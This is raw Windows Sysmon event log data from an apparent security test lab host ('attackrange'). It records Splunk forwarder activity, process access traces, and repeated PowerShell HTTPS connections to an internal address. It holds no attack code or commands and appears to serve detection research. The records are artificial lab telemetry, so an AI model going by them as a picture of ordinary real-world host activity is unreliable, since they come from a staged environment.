18:10:35.849{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56592-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:12.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06433FD7A0F556062E4F81C765813187,SHA256=671C8099AEADD9C6427933A1D549094FDB0A8070A1EA61094977BBAF57BC2436,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:37.047{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56593-false10.0.1.12-8000- 10341000x800000000000000035084343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.614{B81B27B7-4E05-613A-3590-03000000C801}68126496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.514{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C503E14CCF027FEC60EA8B80D4D5AE62,SHA256=B57B2FD8786F39C7FDB3F1BF8ADFA80DCC06C3A91E6D40E57D837499D564AB9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.409{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.991{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C9084DC9B7D9FC194CCD9677AFDA5C4C,SHA256=5DD427440C3587FDE0C86389AB768CBDAABE7A988D5D5AC577660B68C273B319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.544{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9FF21159C331314B1BD9A71853CCB98,SHA256=158BCB79F162CAAF8FEC691C4FA1608A63E8F8F0589611F9846F37DD314CF070,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B970E1DD990F5B025B8BF1FB38BFA361,SHA256=E57751DB990B120B9E1CABDA7D2F0DFF4FEABAED4EE85EA23A8D019DEB7B8C73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA251159CD270862E5A2982B865AA050,SHA256=469001485C42C701FEF2E59E66B2DAC1D541F22F238A02A73EA254CCE2938E8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.077{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:39.863{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56594-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:15.574{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A9D7DED697D6EE55D5AAF60EA4B283,SHA256=006E975524113B67D439A4302BCE860CA26991BE08FFE354D7EA9B7E4ADE3DA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:16.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9B8251CB380B8B470193DE71971914,SHA256=124686DD15A28B996DCAE1591B0EEEA0B753E254597472ABE234F3C45432F6FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:17.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27B9E8FFEF7AEA9AB2EF8E74DDC7409,SHA256=ED857320E660DC9153901C5CC6275CE4E009E576E9C633C4A07EB5C3505C1319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:18.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C318676B9DEE3C9AAD666E67D562CBCA,SHA256=18290D2F4DAB231F83B07449F9652C7FE6B6AEB2BC62116BC6EEF05E18EB0BB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:42.060{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56595-false10.0.1.12-8000- 23542300x800000000000000035084365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC7406AE65D0662C7541255C9855616,SHA256=6FF9E5DBD0FC7A23291AC65996FCBFF92F37909A5153B18425EEC0A99ECD6718,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.875{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56596-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.056{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3675F2993B242847B66F1AEAAE904475,SHA256=8E6F2E5E115E2D39850354F8ECE5614BD6C8721B510FD93C336CE968E6D7D0BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:20.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7E82F03F77216A56577900CE2ECEBD8,SHA256=E611D6CE47C2AA3B826CD8DE6E03DCFD85873E3C65E1CB9A0AC0FD65224DB256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:21.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C196BF37B36ED4D07BACFACFD917AFC3,SHA256=6A3898E8994E42941B77A87CE883F7AA260F17D50C6E616D346B3C8DB6DD68A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:22.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BD65466268C5844D89674BBF82652E,SHA256=8B04ED8B41550AB8EA0F374FC168F51CC39731301B32A4EBCC6EA8CC10EF4381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:48.058{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56597-false10.0.1.12-8000- 23542300x800000000000000035084369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:23.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 